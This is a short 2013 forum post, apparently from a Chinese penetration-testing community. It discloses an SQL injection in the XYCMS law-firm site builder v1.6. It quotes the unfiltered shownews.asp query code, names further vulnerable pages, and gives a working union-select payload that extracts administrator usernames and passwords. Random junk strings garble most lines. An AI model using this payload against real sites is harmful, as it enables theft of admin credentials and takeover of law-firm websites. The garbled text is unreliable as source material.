中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似/ N, n! C) K! p+ m
$ p; G2 E6 V8 t/ r% g
淫荡分割线7 m$ i6 q6 {0 L$ y* ?5 ^
--------------------------------------------------------: W4 [, I, s1 D* K

& F8 T( h7 X5 {+ J0 I9 O0 k审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
9 h" Z3 \( b3 W, p0 u- U源码地址:http://down.chinaz.com/soft/29233.htm
; R  k) v% A9 Y $ R1 n- E1 j# ]7 O& Q
漏洞文件:shownews.asp
$ j3 \1 V3 f9 I* h9 s( \漏洞代码:7-13行
  k3 r, i; z3 @& d% E+ Q - P! G/ J# s8 [6 I) A- b( i2 q9 k* n

, [  F2 y, o$ i& n5 K- ]6 S% y0 F<%
: D0 `1 z/ F0 g1 o' [! Wid=request.QueryString("id")
. @1 h% _: n) a+ ^    % z7 d% {4 Q( q6 N- J2 l
set snews=server.createobject("adodb.recordset")
( l. S- x" z" @, }: xexec="select * from [news] where id="&id2 S, i' c) t4 J
snews.open exec,conn,1,1( X/ j! \1 H$ G8 G: u6 F
%>
. i+ E' |- E% y+ a5 V" O8 O0 m
4 S" M- W! y2 H5 ?- _- ~
) c+ y  |1 w3 s4 l: r什么过滤都没有  直造成注入6 D1 C  z: H! R) E
" g6 S% ~8 K. ^" k) |
注入点:http://127.0.0.1:99/shownews.asp?id=xx5 w. R% ^) p* P) A0 k
% ?& T6 D0 h9 k) }" x4 r
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
# ]3 M+ Y: \! ?$ u, o: t( M2 O , m( E! v( G+ m, j8 E
" ~( |; K* x; L" h. U% ^
exp: union select 1,admin,password,4,5,7 from admin_user
0 g/ |9 [- \2 n! o
0 j* l/ C9 a% q



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2